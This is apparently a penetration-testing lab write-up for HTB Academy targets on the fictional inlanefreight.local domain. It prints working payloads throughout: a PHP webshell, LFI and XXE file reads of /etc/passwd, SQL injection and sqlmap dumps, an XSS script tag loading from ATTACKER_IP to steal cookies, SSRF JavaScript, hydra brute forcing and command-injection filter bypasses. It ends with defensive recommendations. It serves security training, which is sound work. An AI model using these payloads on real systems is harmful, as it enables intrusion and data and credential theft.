🌐Web Enumeration & Exploitation

🎯 Overview

Web applications present the largest attack surface during External Penetration Tests. Focus on high-risk vulnerabilities (RCE, data exposure) rather than minor issues. Use EyeWitness for efficient application discovery and systematic testing of each discovered service.

🔍 Web Application Discovery

📊 EyeWitness Automation

# Subdomain list preparation
cat > ilfreight_subdomains << EOF
inlanefreight.local
blog.inlanefreight.local
careers.inlanefreight.local
dev.inlanefreight.local
gitlab.inlanefreight.local
ir.inlanefreight.local
status.inlanefreight.local
support.inlanefreight.local
tracking.inlanefreight.local
vpn.inlanefreight.local
monitoring.inlanefreight.local
EOF

# Automated screenshot capture
eyewitness -f ilfreight_subdomains -d ILFREIGHT_subdomain_EyeWitness

🌐 Application-by-Application Analysis

📝 blog.inlanefreight.local - Drupal 9

# Version detection
curl -s http://blog.inlanefreight.local | grep Drupal
# Output: Drupal 9 (current stable)

# Assessment result:
- No Drupalgeddon vulnerabilities (9.x not affected)
- Admin authentication unsuccessful
- User registration disabled
- Recommendation: Remove unused test site

💼 careers.inlanefreight.local - Job Portal

# Key findings:
- User registration enabled
- File upload functionality (any file type)
- IDOR vulnerability in profile access

# IDOR exploitation:
http://careers.inlanefreight.local/profile?id=1  # Access other users
http://careers.inlanefreight.local/profile?id=2  # Sensitive data exposure
http://careers.inlanefreight.local/profile?id=3  # Job application details

🔧 dev.inlanefreight.local - Key Vault

# Directory enumeration
gobuster dir -u http://dev.inlanefreight.local -w /usr/share/wordlists/dirb/common.txt -x .php -t 300

# Key discoveries:
/uploads/               # Directory listing enabled
/upload.php            # HTTP 403 but responds with 200

# HTTP Verb Tampering exploitation:
TRACK /upload.php HTTP/1.1
Host: dev.inlanefreight.local
X-Custom-IP-Authorization: 127.0.0.1

# Result: File upload form revealed

🔺 Unrestricted File Upload Chain

# 1. Create PHP webshell
echo '<?php system($_GET["cmd"]); ?>' > shell.php

# 2. Upload with Content-Type bypass
Content-Type: image/png  # Instead of application/x-php

# 3. Command execution
curl "http://dev.inlanefreight.local/uploads/shell.php?cmd=id"
# Output: uid=33(www-data) gid=33(www-data)

💰 ir.inlanefreight.local - WordPress

# WPScan enumeration
wpscan -e ap -t 500 --url http://ir.inlanefreight.local

# Key findings:
- WordPress 6.0 (latest)
- mail-masta plugin (vulnerable to LFI)
- Users: ilfreightwp, tom, james, john

# LFI exploitation (Mail Masta plugin):
curl "http://ir.inlanefreight.local/wp-content/plugins/mail-masta/inc/campaign/count_of_send.php?pl=/etc/passwd"

# Password brute force:
wpscan --url http://ir.inlanefreight.local -P passwords.txt -U ilfreightwp
# Result: ilfreightwp:password1

# WordPress admin access → Theme editor → PHP shell injection

📊 status.inlanefreight.local - Log Search

# SQL injection discovery
Input: '
Error: "MySQL syntax error near '%'' at line 1"

# Manual UNION attack:
' union select null, database(), user(), @@version -- //

# SQLMap exploitation:
sqlmap -r sqli.txt --dbms=mysql --dbs
sqlmap -r sqli.txt --dbms=mysql -D status --tables
sqlmap -r sqli.txt --dbms=mysql -D status -T users --dump

🎫 support.inlanefreight.local - IT Support Portal

# XSS testing in ticket submission
Payload: "><script src=http://ATTACKER_IP:9000/TESTING_THIS></script>

# Blind XSS confirmation
nc -lvnp 9000
# Result: Connection from target with User-Agent: HTBXSS/1.0

# Cookie stealing setup:
# index.php - cookie logger
# script.js - cookie exfiltration payload

# Session hijacking result:
# Admin session cookie captured → Dashboard access

📦 tracking.inlanefreight.local - PDF Generator

# HTML injection testing
Input: <h1>test</h1>
Result: Rendered in PDF tracking field

# SSRF to Local File Read
<script>
x=new XMLHttpRequest;
x.onload=function(){document.write(this.responseText)};
x.open("GET","file:///etc/passwd");
x.send();
</script>

# Result: Local file contents displayed in generated PDF

🔐 vpn.inlanefreight.local - Fortinet SSL VPN

# Assessment result:
- Current version (no known CVEs)
- Common credentials unsuccessful
- Potential password spraying target
- Access denied error message

🦊 gitlab.inlanefreight.local - GitLab Instance

# Misconfiguration assessment:
- User registration enabled (no admin approval)
- Public project access available
- shopdev2.inlanefreight.local project discovered

# Security issues:
- No domain restrictions on registration
- Sensitive project exposure
- Development environment discovery

🛒 shopdev2.inlanefreight.local - Shopping Cart

# Authentication testing:
admin:admin  # Successful login (weak credentials)

# XXE vulnerability in checkout process:
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE userid [
  <!ENTITY xxetest SYSTEM "file:///etc/passwd">
]>
<root>
    <subtotal>undefined</subtotal>
    <userid>&xxetest;</userid>
</root>

# Result: Local file read capability

📊 monitoring.inlanefreight.local - Monitoring Console

# Authentication brute force:
hydra -l admin -P passwords.txt monitoring.inlanefreight.local http-post-form "/login.php:username=admin&password=^PASS^:Invalid Credentials!"
# Result: admin:12qwaszx

# Restricted shell analysis:
Available commands: ls, cat, whoami, date, help, clear, reboot, cd, mv, rm, rmdir, touch, connection_test

# Command injection in connection_test:
GET /ping.php?ip=127.0.0.1%0a'i'd
# Bypass: %0a (newline) + single quotes around commands

# Filter analysis:
Blocked: &, |, ;, \, /, space, whoami, echo, rm, etc.
Bypass: ${IFS} for spaces, %0a for command separation

# Network discovery:
IP addresses: 10.129.203.101 (external), 172.16.8.120 (internal)
# Pivot opportunity into internal network

🎯 Key Vulnerabilities Discovered

🔴 High Risk Findings

1. Unrestricted File Upload (dev.inlanefreight.local)
2. HTTP Verb Tampering (dev.inlanefreight.local)  
3. Local File Inclusion (ir.inlanefreight.local)
4. Weak WordPress Credentials (ir.inlanefreight.local)
5. SQL Injection (status.inlanefreight.local)
6. Cross-Site Scripting (support.inlanefreight.local)
7. SSRF to Local File Read (tracking.inlanefreight.local)
8. Misconfigured GitLab Instance (gitlab.inlanefreight.local)
9. XML External Entity Injection (shopdev2.inlanefreight.local)
10. Command Injection (monitoring.inlanefreight.local)
11. Weak Authentication (multiple applications)

🟡 Medium Risk Findings

1. Directory Listing Enabled (dev.inlanefreight.local)
2. IDOR - User Profile Access (careers.inlanefreight.local)
3. Abandoned Test Applications (blog.inlanefreight.local)

🚀 Attack Chain Summary

🎯 External → Internal Pivot Path

# 1. External reconnaissance
Nmap scans → Service discovery → Subdomain enumeration

# 2. Web application testing
EyeWitness → Individual app analysis → Vulnerability discovery

# 3. Initial foothold options:
- PHP webshell via file upload (dev.inlanefreight.local)
- WordPress theme editor (ir.inlanefreight.local)  
- Command injection (monitoring.inlanefreight.local)

# 4. Internal network access:
monitoring.inlanefreight.local → 172.16.8.120 interface
→ Pivot into internal AD environment

🔧 Tools & Techniques Used

🌐 Web Enumeration

# Application discovery
eyewitness -f subdomain_list -d output_dir

# Directory brute forcing  
gobuster dir -u TARGET -w wordlist -x .php -t 300

# WordPress enumeration
wpscan -e ap,u -t 500 --url TARGET

# Password brute forcing
hydra -l admin -P wordlist TARGET http-post-form "PATH:PARAMS:FAIL_STRING"

⚔️ Exploitation Techniques

# File upload bypass
Content-Type: image/png  # MIME type manipulation

# SQL injection
sqlmap -r request.txt --dbms=mysql --dump -D database -T table

# XSS cookie stealing
<script src=http://ATTACKER/script.js></script>

# XXE local file read
<!DOCTYPE root [<!ENTITY xxe SYSTEM "file:///etc/passwd">]>

# Command injection bypass
%0a'command'  # Newline + single quotes
${IFS}        # Space bypass using environment variable

🎯 HTB Academy Labs

📋 Lab Solutions Summary

Lab 1: IDOR vulnerability → Profile enumeration → Flag discovery
Lab 2: HTTP verb tampering → File upload → Webshell execution  
Lab 3: WordPress exploitation → Theme editor → Reverse shell
Lab 4: SQL injection → Database enumeration → User password extraction
Lab 5: XSS exploitation → Cookie stealing → Session hijacking
Lab 6: SSRF vulnerability → Local file read → Flag extraction
Lab 7: GitLab registration → Project access → Flag discovery
Lab 8: XXE injection → XML manipulation → File system access
Lab 9: Authentication brute force → Command injection → Flag retrieval

🔍 Key Learning Points

# Professional approach:
- Systematic application testing
- Evidence collection for each finding
- Business impact assessment
- Remediation priority guidance

# Technical skills:
- Multi-vector exploitation chains
- Filter bypass techniques  
- Session management attacks
- Local file read escalation

# Real-world scenarios:
- Weak credential prevalence
- Development environment exposure
- Misconfigured public services
- Internal network pivot opportunities

🛡️ Defensive Recommendations

🔒 Application Security

# Input validation:
- Implement proper input sanitization
- Use parameterized queries (SQL injection prevention)
- Validate file uploads (type, size, content)
- Escape user output (XSS prevention)

# Authentication security:
- Enforce strong password policies
- Implement account lockout mechanisms  
- Use multi-factor authentication
- Regular credential audits

# Configuration hardening:
- Remove test/development applications
- Disable unnecessary HTTP methods
- Configure proper error handling
- Implement security headers